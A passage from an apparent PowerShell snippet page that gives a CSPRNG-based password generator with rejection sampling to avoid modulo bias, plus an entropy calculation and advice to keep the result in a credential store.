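For passwords that matter, draw each character from the system CSPRNG instead. The following is an added example, not from the original page: it keeps the same 89-character alphabet (ASCII 38..126) but uses RandomNumberGenerator with rejection sampling, so every character is equally likely (a plain "byte mod 89" would favour the first 78 characters), and it reports the resulting entropy. The function names and the alphabet parameter are this example's own.

```powershell
# Added example: CSPRNG-backed password with rejection sampling to avoid modulo bias
function New-RandomPassword {
    param([int]$Length = 32, [string]$Alphabet = (-join [char[]](38..126)))
    $n = $Alphabet.Length                                    # 89 for the default alphabet
    if ($n -lt 2 -or $n -gt 256) { throw 'alphabet must have 2..256 characters' }
    $limit = 256 - (256 % $n)                                # bytes >= limit are discarded (178 when n = 89)
    $rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $buf = New-Object byte[] 1
    $sb  = New-Object System.Text.StringBuilder
    try {
        while ($sb.Length -lt $Length) {
            $rng.GetBytes($buf)
            if ($buf[0] -lt $limit) { [void]$sb.Append($Alphabet[$buf[0] % $n]) }
        }
    } finally { $rng.Dispose() }
    $sb.ToString()
}

function Get-PasswordEntropyBits {
    param([int]$Length = 32, [int]$AlphabetSize = 89)
    [math]::Round($Length * [math]::Log($AlphabetSize, 2), 1)   # 32 symbols from 89 is about 207 bits
}

New-RandomPassword                                                   # 32 chars, full alphabet
New-RandomPassword -Length 20 -Alphabet 'abcdefghijklmnopqrstuvwxyz0123456789'
Get-PasswordEntropyBits
```

Unlike the shuffle in the one-liner, this draws with replacement, so repeated characters are possible and the entropy is exactly length times log2(alphabet size). Paste the result into a credential store rather than a file in %TEMP%.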
Contribution
Please read the contribution guidelines if you want to contribute.